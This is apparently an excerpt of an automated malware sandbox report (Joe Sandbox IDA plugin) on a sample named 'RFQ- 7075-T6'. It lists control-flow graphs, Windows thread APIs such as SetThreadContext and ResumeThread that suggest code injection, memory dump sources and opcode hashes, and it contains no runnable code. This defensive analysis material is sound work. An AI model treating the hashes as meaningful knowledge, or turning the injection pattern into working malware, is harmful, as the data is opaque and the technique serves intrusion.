                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 215 23c7548-23c75a8 217 23c75bf-23c7607 SetThreadContext 215->217 218 23c75aa-23c75bc 215->218 220 23c7609-23c760f 217->220 221 23c7610-23c765c 217->221 218->217 220->221
                    APIs
                    • SetThreadContext.KERNELBASE(?,?), ref: 023C75F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: 03416ee4aa92ee228f1e267812e64576d4325e396deabb8e3af60755c55c1d60
                    • Instruction ID: c0767f53c2a8961d4f1dd17adffd0349e608936de543738b84a157580a2986f9
                    • Opcode Fuzzy Hash: 03416ee4aa92ee228f1e267812e64576d4325e396deabb8e3af60755c55c1d60
                    • Instruction Fuzzy Hash: 2C31BBB4D012589FCB10CFA9D984AEEFBF5BB49314F14802AE814B7340D738A949CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 226 23c7b10-23c7ba6 ResumeThread 229 23c7baf-23c7bf1 226->229 230 23c7ba8-23c7bae 226->230 230->229
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 023C7B96
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: bc6bbe27c0ac8fb8d1a1ce3de804bcb5cba84933b8a207b159fcbf0a40a877b9
                    • Instruction ID: da3be67612901c723312ae88d9c5ed88389e7c63fdd4c131dc0fc161d6d1852c
                    • Opcode Fuzzy Hash: bc6bbe27c0ac8fb8d1a1ce3de804bcb5cba84933b8a207b159fcbf0a40a877b9
                    • Instruction Fuzzy Hash: 6C31ECB4D002589FCF14CFA9E485AEEFBB5AF49324F10802AE815B7700DB38A846CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 235 23c7b18-23c7ba6 ResumeThread 238 23c7baf-23c7bf1 235->238 239 23c7ba8-23c7bae 235->239 239->238
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 023C7B96
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: be5744e0036947fa3ec977ba00dc75be219b576529af5aa1c4e87539327cd8e5
                    • Instruction ID: 891dd085520e0ad9437840a5981eb848140355dc333972864727b68cd8eb2b7b
                    • Opcode Fuzzy Hash: be5744e0036947fa3ec977ba00dc75be219b576529af5aa1c4e87539327cd8e5
                    • Instruction Fuzzy Hash: 5A31CAB4D002589FCF10CFA9D884AEEFBB5AB49324F10842AE815B7700DB34A945CFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232151000.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c6d000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9fccbb0b999dd2dfaacedb37842c206b998934c5f8c0ad9c4a4b27817261c6d0
                    • Instruction ID: 6c76c42d51d0ec748c31571751df60471024270263ac01a6d64689b165a7be43
                    • Opcode Fuzzy Hash: 9fccbb0b999dd2dfaacedb37842c206b998934c5f8c0ad9c4a4b27817261c6d0
                    • Instruction Fuzzy Hash: 1E2128B1A00240EFDB21DF14D9C0F2ABF65FB88318F248569E8070B616C736D946C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232151000.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c6d000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 08b8c8a6588f0a2404c1293287657b5320395dbc37312e34c3cbec9625be5770
                    • Instruction ID: c2ceb7eec2afee36946b0dbe4f41bfac491962b62730b30417d5936dcc584174
                    • Opcode Fuzzy Hash: 08b8c8a6588f0a2404c1293287657b5320395dbc37312e34c3cbec9625be5770
                    • Instruction Fuzzy Hash: C3212871A04244DFDB11DF10D9C0B6ABB66FB98324F24C569E8064B706C736EC46C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232151000.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c6d000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5cc266a14d3ef7d67b01d83a3dd366f49f170e6375fe939ec088120573f0f532
                    • Instruction ID: 45ecfa37c1627d173efaa0f53424d176f428aac6bb94e06fa7c73a0ead2981ce
                    • Opcode Fuzzy Hash: 5cc266a14d3ef7d67b01d83a3dd366f49f170e6375fe939ec088120573f0f532
                    • Instruction Fuzzy Hash: F811D6B6904280DFDF11CF10D5C4B16BF71FB94324F24C6A9D8064B616C336D556CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232151000.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c6d000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5cc266a14d3ef7d67b01d83a3dd366f49f170e6375fe939ec088120573f0f532
                    • Instruction ID: c3bb5ecb217154685198107167ae61635188feddcfb1bb630e567c30de3fb219
                    • Opcode Fuzzy Hash: 5cc266a14d3ef7d67b01d83a3dd366f49f170e6375fe939ec088120573f0f532
                    • Instruction Fuzzy Hash: 6D11E976904284DFCF11CF10D5C4B26BF72FB94324F24C6A9D8454B616C336D956CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 072a7f6fdd1d7d19fabbbbfe978cdbced6286ba425dfde43fb5be34a0754af69
                    • Instruction ID: 0adf4b41b08c41f49b7beef28cb90876e00db071bc0aabf6e16028252f0002bd
                    • Opcode Fuzzy Hash: 072a7f6fdd1d7d19fabbbbfe978cdbced6286ba425dfde43fb5be34a0754af69
                    • Instruction Fuzzy Hash: 93D1EF30F042548FCB189BB4985577EB6A7BF88704F24883DD44AEBB86DF348C0697A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a647e04c1b524bff4be2ffcd475817d5e719bdbe653ec5c1c1def07ba01f932
                    • Instruction ID: e9bdf687b5aa7acdce2bb0e34f980f80f1172486099c32e2e9d0258f0aed9038
                    • Opcode Fuzzy Hash: 1a647e04c1b524bff4be2ffcd475817d5e719bdbe653ec5c1c1def07ba01f932
                    • Instruction Fuzzy Hash: 52A129B4E002198FDB58DFA9C890BDEB7B2AB88314F54C06EDA08E7341DB345A85CF51
                    Uniqueness

                    Uniqueness Score: -1.00%